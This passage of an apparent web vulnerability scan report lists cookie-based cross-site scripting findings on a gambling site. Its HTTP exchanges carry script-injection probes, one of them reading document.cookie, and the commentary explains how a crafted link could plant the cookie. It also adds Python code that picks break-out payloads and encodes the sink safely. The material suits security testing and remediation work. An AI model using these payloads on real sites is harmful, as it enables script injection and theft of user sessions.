P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:28:54 GMT; path=/
Set-Cookie: lang=ENG1efd1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3c552cf62ce; expires=Wed, 15-Jun-2011 12:28:54 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:28:54 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:28:54 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG1efd1"><script>alert(1)</script>3c552cf62ce', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.184. http://scratch.co.uk/promotions/argos/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /promotions/argos/

Issue detail

The value of the affiliate cookie is copied into the name of an HTML tag attribute. The payload 4c8ee><script>alert(1)</script>3e5e2c01180 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response. The sink is the same href attribute as in the other scratch.co.uk entries; it is classified as an attribute name here only because the currency cookie sent with this request already contains a double quote (USD737fc"...), which closes the href value before the affiliate value is written, so the probe needs no leading quote to reach tag context.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. That mitigation should not be taken at face value here: the Referer in this request is a visit to http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445, and the same value now arrives in the currency cookie and is re-issued by Set-Cookie in the response. If the application sets the currency cookie from the currency query parameter, as those headers suggest, a crafted link alone plants the cookie and the issue becomes an ordinary reflected XSS; confirm that with a direct request before rating it as informational.

Request

GET /promotions/argos/ HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C2434c8ee><script>alert(1)</script>3e5e2c01180; lang=ENG; currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.3.8.1305550702422; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:58:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v7qe830mrf84u47aa649e3l553; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2434c8ee%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3e5e2c01180; expires=Wed, 15-Jun-2011 12:58:42 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:42 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:58:42 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:42 GMT; path=/
Content-Type: text/html
Content-Length: 11164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD737fc";alert(document.cookie)//814391c7445', 'ENG', 'direct-173|193|214|2434c8ee><script>alert(1)</script>3e5e2c01180');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...
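Burp reports the same affiliate-cookie reflection as "value of an HTML tag attribute" on /problem-gambling/ and as "name of an HTML tag attribute" on /promotions/argos/ (3.184, and likewise 3.186 and 3.187). The difference is in the request, not the application: the currency cookie in the argos requests already carries a double quote from an earlier probe, which closes the href attribute before the next cookie value is written. The classifier below is an added example, not Burp's implementation; it reproduces that distinction with a minimal HTML attribute tokenizer and returns the break-out prefix the report used for each context. The two response excerpts are copied from the entries on this page; the third sample is constructed. Script and style bodies and comments are not modelled.

```python
# Response excerpts copied from the report: the /problem-gambling/ affiliate
# entry (clean context) and the /promotions/argos/ affiliate entry (context
# already broken by the currency cookie's stray double quote).
CLEAN = (
    '<a href="javascript:openScratch(\'GBP\', \'ENG\', '
    '\'direct-173|193|214|243394d5"><script>alert(1)</script>18bf32caf70\');" '
    'onclick="pageTracker._trackEvent(\'Join\', \'Top Nav\');">'
)
POLLUTED = (
    '<a href="javascript:openScratch(\'USD737fc";alert(document.cookie)//814391c7445\', '
    '\'ENG\', \'direct-173|193|214|2434c8ee><script>alert(1)</script>3e5e2c01180\');" '
    'onclick="pageTracker._trackEvent(\'Join\', \'Top Nav\');">'
)

LABELS = {
    "text": "HTML text",
    "tag": "attribute name (or tag name)",
    "before_value": "attribute value (unquoted)",
    "unq": "attribute value (unquoted)",
    "dq": "attribute value (double-quoted)",
    "sq": "attribute value (single-quoted)",
}

# The shortest prefix that escapes each context into a fresh tag; these are
# the probes the report itself used for the double-quoted and name contexts.
BREAKOUT = {
    "attribute value (double-quoted)": '"><script>alert(1)</script>',
    "attribute value (single-quoted)": "'><script>alert(1)</script>",
    "attribute value (unquoted)": "><script>alert(1)</script>",
    "attribute name (or tag name)": "><script>alert(1)</script>",
    "HTML text": "<script>alert(1)</script>",
}

WS = " \t\n\r\f"


def reflection_context(body, canary):
    """Tokenize body up to the first occurrence of canary, following the HTML
    tokenizer's attribute states: a quote opens a value only directly after
    '=', and a '>' inside a quoted value does not end the tag."""
    pos = body.find(canary)
    if pos < 0:
        return "not reflected"
    state = "text"
    for c in body[:pos]:
        if state == "text":
            if c == "<":
                state = "tag"
        elif state == "tag":
            if c == ">":
                state = "text"
            elif c == "=":
                state = "before_value"
        elif state == "before_value":
            if c in WS:
                continue
            elif c == '"':
                state = "dq"
            elif c == "'":
                state = "sq"
            elif c == ">":
                state = "text"
            else:
                state = "unq"
        elif state == "dq":
            if c == '"':
                state = "tag"
        elif state == "sq":
            if c == "'":
                state = "tag"
        elif state == "unq":
            if c in WS:
                state = "tag"
            elif c == ">":
                state = "text"
    return LABELS[state]


def breakout_for(body, canary):
    """Pick the probe prefix that matches where the canary landed."""
    return BREAKOUT.get(reflection_context(body, canary))


if __name__ == "__main__":
    for name, body, canary in (("clean", CLEAN, "394d5"), ("polluted", POLLUTED, "4c8ee")):
        print(name, "->", reflection_context(body, canary), repr(breakout_for(body, canary)))
```

The practical consequence for triage is that the three argos entries are one sink reached through a dirty test session, not a second, differently shaped bug; re-running them with a clean cookie jar should collapse them back into the double-quoted-attribute case.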

3.185. http://scratch.co.uk/promotions/argos/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /promotions/argos/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 934e5"><script>alert(1)</script>634156e0232 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/argos/ HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=934e5"><script>alert(1)</script>634156e0232; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.3.8.1305550702422; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:58:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f6g2ell6noo67hb2etoak5a2j6; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:58:45 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:45 GMT; path=/
Set-Cookie: currency=934e5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E634156e0232; expires=Wed, 15-Jun-2011 12:58:45 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:45 GMT; path=/
Content-Type: text/html
Content-Length: 11246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('934e5"><script>alert(1)</script>634156e0232', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.186. http://scratch.co.uk/promotions/argos/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /promotions/argos/

Issue detail

The value of the currency cookie is copied into the name of an HTML tag attribute. The payload b3cbb><script>alert(1)</script>3e0744b42e1 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/argos/ HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445b3cbb><script>alert(1)</script>3e0744b42e1; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.3.8.1305550702422; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:58:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hvmdk8ph4m8169sgi7bigmled5; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:58:44 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:44 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445b3cbb%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3e0744b42e1; expires=Wed, 15-Jun-2011 12:58:44 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:44 GMT; path=/
Content-Type: text/html
Content-Length: 11164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD737fc";alert(document.cookie)//814391c7445b3cbb><script>alert(1)</script>3e0744b42e1', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.187. http://scratch.co.uk/promotions/argos/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /promotions/argos/

Issue detail

The value of the lang cookie is copied into the name of an HTML tag attribute. The payload 6154e><script>alert(1)</script>de94baa06bd was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/argos/ HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG6154e><script>alert(1)</script>de94baa06bd; currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.3.8.1305550702422; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:58:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n43q1ra7ukm7bjt67kuhs994a1; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:58:43 GMT; path=/
Set-Cookie: lang=ENG6154e%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ede94baa06bd; expires=Wed, 15-Jun-2011 12:58:43 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:58:43 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:43 GMT; path=/
Content-Type: text/html
Content-Length: 11466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD737fc";alert(document.cookie)//814391c7445', 'ENG6154e><script>alert(1)</script>de94baa06bd', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.188. http://scratch.co.uk/terms/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /terms/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df291"><script>alert(1)</script>e30d2cf3290 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /terms/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243df291"><script>alert(1)</script>e30d2cf3290; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243df291%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee30d2cf3290; expires=Wed, 15-Jun-2011 12:26:28 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:28 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:28 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:28 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243df291"><script>alert(1)</script>e30d2cf3290');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.189. http://scratch.co.uk/terms/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /terms/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 252c4"><script>alert(1)</script>6054300a549 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /terms/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP252c4"><script>alert(1)</script>6054300a549;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:48 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:48 GMT; path=/
Set-Cookie: currency=GBP252c4%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6054300a549; expires=Wed, 15-Jun-2011 12:30:48 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:48 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP252c4"><script>alert(1)</script>6054300a549', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.190. http://scratch.co.uk/terms/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /terms/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93c11"><script>alert(1)</script>fbc71e06f6a was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /terms/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG93c11"><script>alert(1)</script>fbc71e06f6a; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:40 GMT; path=/
Set-Cookie: lang=ENG93c11%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efbc71e06f6a; expires=Wed, 15-Jun-2011 12:30:40 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:40 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:40 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG93c11"><script>alert(1)</script>fbc71e06f6a', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...
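
The following is an added example, not code from this report or from scratch.co.uk, showing why the javascript: href sink quoted above breaks out and how to encode a value for that nested context. TEMPLATE is a constructed stand-in for the <a href="javascript:openScratch(...)"> markup in the response; PAYLOAD is the canary the report submitted in the lang cookie; the allow-list patterns in ALLOWED are assumptions derived only from the cookie values visible in this report (GBP, ENG, direct-173|193|214|243) and must be widened if other values are legitimate. It re-parses both renderings the way a browser would, so the difference between the raw and the hardened output is checked rather than asserted.

```python
"""Nested-context encoding for a value that lands in: JS string literal -> javascript: URL -> HTML attribute."""
import html
import re
from html.parser import HTMLParser

# Constructed stand-in for the markup quoted in the scratch.co.uk responses.
TEMPLATE = ("<a href=\"javascript:openScratch('{currency}', '{lang}', '{affiliate}');\" "
            "onclick=\"pageTracker._trackEvent('Join', 'Top Nav');\">")

# Canary from issue 3.190, verbatim from the report.
PAYLOAD = '93c11"><script>alert(1)</script>fbc71e06f6a'

# Assumed allow-list: derived only from the values seen in the report, not from application docs.
ALLOWED = {
    'currency': re.compile(r'^[A-Z]{3}$'),
    'lang': re.compile(r'^[A-Z]{3}$'),
    'affiliate': re.compile(r'^[a-z]+-\d+(\|\d+)*$'),
}


def render_vulnerable(currency, lang, affiliate):
    """What the application does: cookie bytes are copied into the markup unmodified."""
    return TEMPLATE.format(currency=currency, lang=lang, affiliate=affiliate)


def js_string_escape(value):
    """Escape for a JS string literal: every non-alphanumeric character becomes \\xHH (or \\uHHHH).
    Both quote kinds, backslash, <, > and newlines are neutralised, so the value cannot end the
    literal whichever quote delimits it, and cannot introduce markup after HTML decoding."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        else:
            cp = ord(ch)
            out.append('\\x%02x' % cp if cp < 0x100 else '\\u%04x' % cp)
    return ''.join(out)


def js_string_unescape(literal):
    """Inverse of js_string_escape; used to show the hardened output round-trips as plain data."""
    return re.sub(r'\\x([0-9a-f]{2})|\\u([0-9a-f]{4})',
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), literal)


def render_hardened(currency, lang, affiliate):
    """Encode inside-out. The browser decodes the HTML attribute first and evaluates the JS second,
    so JS-string-escape first and HTML-attribute-escape last. HTML escaping alone is not enough:
    &#39; is decoded back to a quote before the javascript: URL is ever run."""
    def enc(v):
        return html.escape(js_string_escape(v), quote=True)
    return TEMPLATE.format(currency=enc(currency), lang=enc(lang), affiliate=enc(affiliate))


def cookie_is_allowed(name, value):
    """Defence in depth: reject cookie values outside the documented format before rendering."""
    return bool(ALLOWED[name].match(value))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for k, v in attrs:
            if k == 'href':
                self.hrefs.append(v)


def analyse(markup):
    """Parse the markup as a browser would. Returns (tag names seen, decoded second openScratch
    argument or None). A <script> tag in the list means the value escaped the attribute."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    lang_arg = None
    if p.hrefs:
        m = re.search(r"openScratch\('([^']*)', '([^']*)', '([^']*)'\)", p.hrefs[0])
        if m:
            lang_arg = js_string_unescape(m.group(2))
    return p.tags, lang_arg


if __name__ == '__main__':
    args = ('GBP', 'ENG' + PAYLOAD, 'direct-173|193|214|243')
    print(analyse(render_vulnerable(*args)))  # (['a', 'script'], None): the canary became markup
    print(analyse(render_hardened(*args)))    # (['a'], 'ENG93c11"><script>...'): data, not code
    print(cookie_is_allowed('lang', args[1]))  # False: the allow-list rejects it before rendering
```

The allow-list check is the cheaper fix for these three cookies, since each has a tiny legitimate value space; the encoder is what protects any value that genuinely has to reach a javascript: URL.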

3.191. http://scratch.co.uk/vis-club/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /vis-club/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb957"><script>alert(1)</script>c680567ffc0 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /vis-club/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
